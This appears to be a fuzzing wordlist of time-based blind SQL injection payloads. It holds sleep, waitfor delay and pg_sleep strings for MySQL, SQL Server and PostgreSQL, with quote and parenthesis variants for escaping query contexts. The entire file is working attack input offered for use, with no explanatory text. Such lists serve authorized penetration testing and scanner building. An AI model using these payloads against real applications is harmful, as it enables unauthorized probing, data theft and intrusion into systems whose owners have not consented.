sleep(6)#
1 or sleep(6)#
" or sleep(6)#
' or sleep(6)#
" or sleep(6)="
' or sleep(6)='
1) or sleep(6)#
") or sleep(6)="
') or sleep(6)='
1)) or sleep(6)#
")) or sleep(6)="
')) or sleep(6)='
;waitfor delay '0:0:6'--
);waitfor delay '0:0:6'--
';waitfor delay '0:0:6'--
";waitfor delay '0:0:6'--
');waitfor delay '0:0:6'--
");waitfor delay '0:0:6'--
));waitfor delay '0:0:6'--
'));waitfor delay '0:0:6'--
"));waitfor delay '0:0:6'--
pg_sleep(6)--
1 or pg_sleep(6)--
" or pg_sleep(6)--
' or pg_sleep(6)--
1) or pg_sleep(6)--
") or pg_sleep(6)--
') or pg_sleep(6)--
1)) or pg_sleep(6)--
")) or pg_sleep(6)--
')) or pg_sleep(6)--
AND (SELECT * FROM (SELECT(SLEEP(6)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(6)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(6)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(6)))nQIP)--
AND (SELECT * FROM (SELECT(SLEEP(6)))nQIP)#
SLEEP(6)#
SLEEP(6)--
SLEEP(6)="
SLEEP(6)='
SLEEP(6)/*' or SLEEP(6) or '" or SLEEP(6) or "*/
